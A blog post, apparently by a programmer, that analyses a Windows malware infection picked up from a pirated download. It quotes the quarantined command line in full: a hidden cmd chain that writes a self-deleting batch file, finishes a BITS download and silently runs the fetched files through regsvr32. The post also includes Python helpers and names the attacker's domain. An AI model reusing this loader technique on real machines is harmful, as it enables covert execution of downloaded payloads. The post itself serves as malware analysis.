When most people see a ‘Threat found’ notification, they simply let their trusted antivirus take care of it. Well, being a curious programmer, I decided to have a look at the quarantined virus.
This is the journey as I decipher a piece of malware that I found on my PC and get to the real identity of my hackers. So come along for the ride.
Where it all started.
What happens when you want a piece of software/music but have no cash to spare?
You get it on thepiratebay3.org 👍
No, just kidding, you should never download any software/music from piratebay or any other torrent sites 😀
For this is what will happen to you
I started getting persistent ‘Threat found’ notifications. Immediately I stopped the installation and did a quick scan. After that, I updated Windows Defender and ran a full scan.
Three days later and I’m still getting the ‘Threat found’ notification.
That was odd, as I always did daily updates and after that I would do a quick scan. So I did what any other regular Joe would do and ran another quick scan, then a full scan and finally an offline scan, but I still got the same notification: ‘Windows Defender has found a new threat’.
Being a curious programmer, I decided to have a look at the malware’s source code in the Windows Defender quarantine section.
Hmm... That’s interesting 🤔, how come Windows has not yet been able to solve this issue when the source code is right there in front of my eyes?
CmdLine: \Device\HarddiskVolume4\Windows\System32\cmd.exe "cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\a1e62b52-3bf5-0\x.bat" & echo bitsadmin /complete a1e62b52-3bf5-0 ^> nul >> "C:\ProgramData\a1e62b52-3bf5-0\x.bat" & echo bitsadmin /cancel a1e62b52-3bf5-0 ^> nul >> "C:\ProgramData\a1e62b52-3bf5-0\x.bat" & echo if exist "C:\ProgramData\a1e62b52-3bf5-0\a1e62b52-3bf5-0.d" goto q >> "C:\ProgramData\a1e62b52-3bf5-0\x.bat" & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\a1e62b52-3bf5-0\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"!=47468f40a1e62b53 " "C:\ProgramData\a1e62b52-3bf5-0\%i" >> "C:\ProgramData\a1e62b52-3bf5-0\x.bat")) > nul & echo :q >> "C:\ProgramData\a1e62b52-3bf5-0\x.bat" & echo start /b /min regsvr32.exe /s /n /i:"!=47468f40a1e62b53 " "C:\ProgramData\a1e62b52-3bf5-0\a1e62b52-3bf5-0.d" >> "C:\ProgramData\a1e62b52-3bf5-0\x.bat" & echo del "C:\ProgramData\a1e62b52-3bf5-0\x.bat" ^& exit >> "C:\ProgramData\a1e62b52-3bf5-0\x.bat" & "C:\ProgramData\a1e62b52-3bf5-0\x.bat""
\cmd.exe "cmd.exe" /c start /min cmd /
This starts a second command prompt, minimised (start /min), whose only job is to write a batch file, C:\ProgramData\a1e62b52-3bf5-0\x.bat, one line at a time with echo, run it, and close when it completes (/c). Everything that follows in the one-liner is the content of that batch file being written out.
This happens so fast that you would hardly notice it.
Second Clue: (Bitsadmin)
Not an administrator at all: bitsadmin.exe is the command-line client for the Background Intelligent Transfer Service (BITS), the Windows component that Windows Update uses to download files quietly in the background. bitsadmin /complete a1e62b52-3bf5-0 finalises a download job with that name (BITS moves the job's temporary file to its final filename) and bitsadmin /cancel a1e62b52-3bf5-0 removes the job. So the payload this script runs was fetched through BITS, which runs as a Windows service and never shows a download window, and the job name is the same as the directory name under C:\ProgramData. Whether it then spies on me, or ships my data off to some remote server, we do not know yet.
Let's keep going…
& echo if exist "C:\ProgramData\a1e62b52-3bf5-0\a1e62b52-3bf5-0.d"
Hmm... the script checks whether the file a1e62b52-3bf5-0.d exists in that directory.
The next piece of code is:
goto q >> "C:\ProgramData\a1e62b52-3bf5-0\x.bat"
This does not mean ‘proceed to the directory’. If the file exists, goto q jumps to the label :q further down the batch file, which skips straight to running the .d file. Note also that the >> "C:\ProgramData\a1e62b52-3bf5-0\x.bat" at the end of each piece is not executed at this point: the outer command is appending each line to x.bat, which only runs at the very end.
& for /f %i in ('dir /a:-d /b /w "C:\ProgramData\a1e62b52-3bf5-0\*.tmp
The script lists the directory (dir /a:-d /b prints only files, not subdirectories, one bare name per line) and loops over every file with the .tmp extension.
For each one it appends this line to x.bat:
do (echo start /b /min regsvr32.exe
When x.bat runs, that line starts regsvr32.exe without opening a window (start /b, /min) and hands it the .tmp file.
regsvr32.exe is a legitimate, Microsoft-signed Windows program used to register and unregister OLE controls, such as DLLs and ActiveX controls, in the Windows Registry. The switches matter: /s makes it silent, /n tells it not to call the usual DllRegisterServer entry point, and /i:"!=47468f40a1e62b53 " makes it call the file's DllInstall entry point with that string as the argument instead. In other words, each .tmp file is expected to be a DLL, and a trusted Windows binary is being used to load and run it.
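To see the whole batch file at once rather than clue by clue, here is an added example (my own code, not the author's and not part of the malware) that rebuilds x.bat from the command line above: it strips the outer cmd /c quoting, splits on unquoted &, collects every echo ... > / >> "x.bat" piece, removes the ^ escapes, and expands the for loop over whatever .tmp names you pass in. It assumes the directory name uses plain hyphens (the blog's en-dashes are a formatting artifact) and uses BIT3D39.tmp, the one .tmp file found later in the post, as the loop input.

```python
import re

# The Defender command line from the post, with the blog's smart quotes and
# en-dashes repaired (assumption: the real directory name uses plain hyphens).
CMDLINE = (
    r'\Device\HarddiskVolume4\Windows\System32\cmd.exe "cmd.exe" /c start /min cmd /c "'
    r'(echo @echo off > "C:\ProgramData\a1e62b52-3bf5-0\x.bat" & '
    r'echo bitsadmin /complete a1e62b52-3bf5-0 ^> nul >> "C:\ProgramData\a1e62b52-3bf5-0\x.bat" & '
    r'echo bitsadmin /cancel a1e62b52-3bf5-0 ^> nul >> "C:\ProgramData\a1e62b52-3bf5-0\x.bat" & '
    r'echo if exist "C:\ProgramData\a1e62b52-3bf5-0\a1e62b52-3bf5-0.d" goto q >> '
    r'"C:\ProgramData\a1e62b52-3bf5-0\x.bat" & '
    r"for /f %i in ('dir /a:-d /b /w " r'"C:\ProgramData\a1e62b52-3bf5-0\*.tmp"' r"') do "
    r'(echo start /b /min regsvr32.exe /s /n /i:"!=47468f40a1e62b53 " '
    r'"C:\ProgramData\a1e62b52-3bf5-0\%i" >> "C:\ProgramData\a1e62b52-3bf5-0\x.bat")) > nul & '
    r'echo :q >> "C:\ProgramData\a1e62b52-3bf5-0\x.bat" & '
    r'echo start /b /min regsvr32.exe /s /n /i:"!=47468f40a1e62b53 " '
    r'"C:\ProgramData\a1e62b52-3bf5-0\a1e62b52-3bf5-0.d" >> "C:\ProgramData\a1e62b52-3bf5-0\x.bat" & '
    r'echo del "C:\ProgramData\a1e62b52-3bf5-0\x.bat" ^& exit >> "C:\ProgramData\a1e62b52-3bf5-0\x.bat" & '
    r'"C:\ProgramData\a1e62b52-3bf5-0\x.bat""'
)

# The last ' > "file"' or ' >> "file"' in a statement is the batch file being written.
REDIRECT = re.compile(r'^(.*)\s(>>|>)\s*"([^"]*)"')


def inner_command(cmdline):
    """Return what the nested 'cmd /c "..."' actually executes.

    With more than two quote characters after /c, cmd.exe strips only the first
    and the last quote, so the nested "..." paths survive intact.
    """
    body = cmdline.split(' cmd /c "', 1)[1]
    return body[:-1] if body.endswith('"') else body


def split_statements(cmd):
    """Split a cmd.exe line on '&' that is neither inside quotes nor escaped with '^'."""
    parts, buf, in_quote, i = [], [], False, 0
    while i < len(cmd):
        ch = cmd[i]
        if ch == '^' and not in_quote and i + 1 < len(cmd):
            buf.append(cmd[i:i + 2])      # keep the escape pair; unescape() removes it later
            i += 2
            continue
        if ch == '"':
            in_quote = not in_quote
        if ch == '&' and not in_quote:
            parts.append(''.join(buf).strip())
            buf = []
        else:
            buf.append(ch)
        i += 1
    parts.append(''.join(buf).strip())
    return parts


def unescape(text):
    """'^>' and '^&' are echoed into the batch file as plain '>' and '&'."""
    return re.sub(r'\^(.)', r'\1', text)


def reconstruct_batch(cmdline, tmp_files):
    """Rebuild the batch file the one-liner writes with echo and redirection.

    tmp_files are the *.tmp names the 'for /f' loop would see in the directory
    when the one-liner runs (the post found one: BIT3D39.tmp).
    Returns (batch_path, batch_lines, executed_path).
    """
    statements = split_statements(inner_command(cmdline))
    path, lines = None, []
    for stmt in statements:
        m = REDIRECT.match(stmt)
        if not m:
            continue                      # no redirection: the final statement just runs the batch
        body, op, target = m.group(1).lstrip('( ').strip(), m.group(2), m.group(3)
        if op == '>':                     # '>' truncates, so this starts a fresh file
            path, lines = target, []
        elif path is None:
            path = target
        if body.startswith('for '):       # one regsvr32 line per *.tmp file found
            template = unescape(body.split(' do (echo ', 1)[1])
            lines.extend(template.replace('%i', name) for name in tmp_files)
        elif body.startswith('echo '):
            lines.append(unescape(body[5:]))
    executed = statements[-1].strip('"')
    return path, lines, executed


if __name__ == '__main__':
    batch_path, batch, run = reconstruct_batch(CMDLINE, ['BIT3D39.tmp'])
    print(f'REM {batch_path} (the one-liner then executes it: {run == batch_path})')
    print('\n'.join(batch))
```

Running it prints the eight-line batch: complete and cancel the BITS job, jump to :q if the .d file already exists, otherwise run regsvr32 on each .tmp, then run regsvr32 on the .d file, and finally delete x.bat itself, which is why there is nothing left on disk to find but the download directory.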
So let's go to the file location.
Guess what we find? BIT3D39.tmp
A name of the form BIT followed by hex digits with a .tmp extension is the naming pattern BITS uses for a download in progress, so this is the file the bitsadmin job above was fetching.
Let's keep going…
Fifth Clue (Opening the Trojan file)
Let's have a look at how glorified hackers write malware code 😎.
Let's break it down; this should be fun 😉
Sixth Clue (metadata)
<meta http-equiv=pragma content=nocache>
<META HTTP-EQUIV=Expires CONTENT=-1>
These two headers tell the browser not to keep a cached copy of the page: Pragma: no-cache, plus an Expires value of -1, which marks the page as already expired. (They affect the browser cache, not the computer's memory.) This is common on login and redirect pages, and here it means the client fetches a fresh copy every time, so the hackers can change the script and have the latest version run on the next visit. Note also that what we have opened is an HTML page, not a DLL: regsvr32 cannot load a file like this, so this .tmp is what the BITS job actually brought back, whatever it was meant to deliver.
Seventh Clue (auto-submit function)
When the page loads, the script submits the form automatically, sending a POST request to the endpoint named in the form's action. The .jsp extension on that endpoint suggests the hackers' back-end is a Java web application (JavaServer Pages); a file extension is only a hint, since a server can be configured to answer any path, but it is the best clue we have. Either way, this would mean the script is either:
i. uploading data from my computer to the hackers' remote server, or
ii. keeping my computer in regular contact with the hackers' server.
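As an added example (my own code, not the author's), here is a static way to pull the endpoint, the method and the submitted fields out of a downloaded page without opening it in a browser, which would make a live request to the attackers' server from your own IP address. Only the two meta tags in the sample come from the post; the form, its action path on domenjob.com and its fields are constructed placeholders.

```python
from html.parser import HTMLParser

# Constructed sample, NOT the file from the post: the two <meta> tags are quoted
# from the post, everything else (script, form, action path, fields) is a placeholder.
SAMPLE_HTML = """<html><head>
<meta http-equiv=pragma content=nocache>
<META HTTP-EQUIV=Expires CONTENT=-1>
<script>function go(){ document.forms[0].submit(); }</script>
</head><body onload="go()">
<form method="post" action="http://domenjob.com/placeholder.jsp">
<input type="hidden" name="id" value="sample-id">
<input type="hidden" name="v" value="1">
</form></body></html>"""


class FormExtractor(HTMLParser):
    """Collect http-equiv metas, forms (method, action, fields) and auto-submit hints."""

    def __init__(self):
        super().__init__()
        self.metas = {}
        self.forms = []
        self.autosubmit = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or '') for k, v in attrs}
        if tag == 'meta' and 'http-equiv' in a:
            self.metas[a['http-equiv'].lower()] = a.get('content', '')
        elif tag == 'form':
            self.forms.append({'method': a.get('method', 'get').upper(),
                               'action': a.get('action', ''), 'fields': []})
        elif tag == 'input' and self.forms:
            self.forms[-1]['fields'].append((a.get('name', ''), a.get('value', '')))
        if any('submit(' in v for v in a.values()):   # e.g. onload="document.f.submit()"
            self.autosubmit = True

    def handle_data(self, data):                        # <script> bodies arrive here
        if 'submit(' in data:
            self.autosubmit = True


def analyse_page(html):
    """Static summary of a downloaded page: where it posts, what it posts, and whether it fires on load."""
    p = FormExtractor()
    p.feed(html)
    p.close()
    nocache = p.metas.get('pragma', '').lower() == 'nocache' or p.metas.get('expires') == '-1'
    return {'metas': p.metas, 'forms': p.forms, 'autosubmit': p.autosubmit, 'nocache': nocache}


if __name__ == '__main__':
    for key, value in analyse_page(SAMPLE_HTML).items():
        print(f'{key}: {value}')
```

The endpoint and field names you get this way are what you feed into whois and passive DNS lookups; they are also the indicators you can search the rest of the machine and the proxy logs for, all without ever touching the server.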
Curious to know where the data ends up?
I paste the URL into my browser and this is what I get.
The server is down! That’s good news. They must have been taken down. But that’s not quite the case.
I decide to go even deeper into the rabbit hole in order to get the server’s info.
Server Info (http://domenjob.com)
I head over to an IP checker to get the full server details and this is what I find:
IP Address: 184.108.40.206
Geolocation: NL (Netherlands)
So the server is located in the Netherlands and now we have the public IP. That’s close enough to find their identity. A caveat, though: IP geolocation places the hosting provider's data centre, not the people renting the server, and the records below belong to the registrar, not to whoever registered the domain.
So they have not been shut down; the domain is still registered (the registration expires in 2019), so the server has been taken offline temporarily, or is simply not answering right now.
Registrar Abuse Contact Email: email@example.com
Registrar Abuse Contact Phone: +16502620100
Now we have a contact to report the hackers to. The registrar's abuse desk can suspend the domain; the hosting provider that owns the IP address block has its own abuse contact (listed in the IP's whois record) and is the one who can take the server itself down.
To be continued…